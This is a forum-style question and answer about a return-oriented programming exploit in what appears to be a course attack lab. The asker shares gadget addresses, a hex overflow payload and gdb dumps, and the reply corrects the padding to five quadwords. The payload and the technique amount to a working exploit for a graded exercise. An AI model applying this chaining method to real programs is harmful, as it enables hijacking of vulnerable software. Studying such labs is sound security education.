0000000000401f91 <addval_168>:
401f91: f3 0f 1e fa endbr64
401f95: 8d 87 0d 92 58 90 lea -0x6fa76df3(%rdi),%eax
401f9b: c3 retq
I use 0x401f99 as the address of the "58" byte, which is:
popq %rax;
0000000000401fbd <addval_217>:
401fbd: f3 0f 1e fa endbr64
401fc1: 8d 87 48 89 c7 c3 lea -0x3c3876b8(%rdi),%eax
401fc7: c3 retq
and I use the address 0x401fc3 for "48 89 c7 c3", which is:
movq %rax, %rdi;
ret;
I have set up my payload like this:
00 00 00 00 00 00 00 00 # Padding (buffer overflow)
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
99 1f 40 00 00 00 00 00 # (First gadget: popq %rax)
10 76 a6 11 00 00 00 00 # (Cookie - gets popped into %rax)
c3 1f 40 00 00 00 00 00 # (Second gadget: movq %rax, %rdi)
9d 1d 40 00 00 00 00 00 # (Final gadget: touch2)
This matches the format of every version of the answer I have seen, including my classmate's final answer. I double-checked the formatting of the cookie and of the touch2 address, and that classmate confirmed that my entry is no different in format from his correct one. However, I get this result:
ylx739:tesla22 ~/attack/target72> ./rtarget < phase4-raw.txt
./rtarget: /lib64/libcurl.so.4: no version information available (required by ./rtarget)
Cookie: 0x11a67610
Type string:Misfire: You called touch2(0x00000001)
FAILED
I looked at the stack immediately after the Gets call in the function that reads my input into the buffer, and found:
(gdb) x/20xg $rsp
0x7ffffff91620: 0x0000000000000000 0x0000000000000000
0x7ffffff91630: 0x0000000000401f99 0x0000000011a67610
0x7ffffff91640: 0x0000000000401fc3 0x0000000000401d9d
0x7ffffff91650: 0x0000000000403100 0x0000000000402752
0x7ffffff91660: 0xf4f4f4f4f4f4f4f4 0xf4f4f4f4f4f4f4f4
which contains everything I entered, but once I enter touch2(), the function I am trying to overflow into, I find:
(gdb) print/x $rdi
$1 = 0x7ffff7b389c0
which is some random address. I am not at all sure why my cookie is not being moved into %rdi. Any help would be appreciated.

*Edit: touch2, the target of the overflow:
0000000000401d9d <touch2>:
401d9d: f3 0f 1e fa endbr64
401da1: 50 push %rax
401da2: 58 pop %rax
401da3: 48 83 ec 08 sub $0x8,%rsp
401da7: 89 fa mov %edi,%edx
401da9: c7 05 49 37 00 00 02 movl $0x2,0x3749(%rip) # 4054fc <vlevel>
401db0: 00 00 00
401db3: 39 3d 4b 37 00 00 cmp %edi,0x374b(%rip) # 405504 <cookie>
401db9: 74 2a je 401de5 <touch2+0x48>
401dbb: 48 8d 35 e6 14 00 00 lea 0x14e6(%rip),%rsi # 4032a8 <_IO_stdin_used+0x2a8>
getbuf(), the function being overflowed:
(gdb) disas getbuf
Dump of assembler code for function getbuf:
0x0000000000401d4f <+0>: endbr64
0x0000000000401d53 <+4>: sub $0x28,%rsp
0x0000000000401d57 <+8>: mov %rsp,%rdi
0x0000000000401d5a <+11>: callq 0x4021e7 <Gets>
0x0000000000401d5f <+16>: mov $0x1,%eax
0x0000000000401d64 <+21>: add $0x28,%rsp
0x0000000000401d68 <+25>: retq
End of assembler dump.
The function containing the vulnerable call uses a stack frame of 5 QWORDs, as shown by its `sub $0x28,%rsp` / `add $0x28,%rsp` pair. Therefore your payload needs 5 QWORDs of padding rather than 3. With your current version, the first two QWORDs of your chain are still inside the buffer that getbuf hands to Gets when getbuf returns, which is why your second gadget ends up moving the wrong value into %rdi.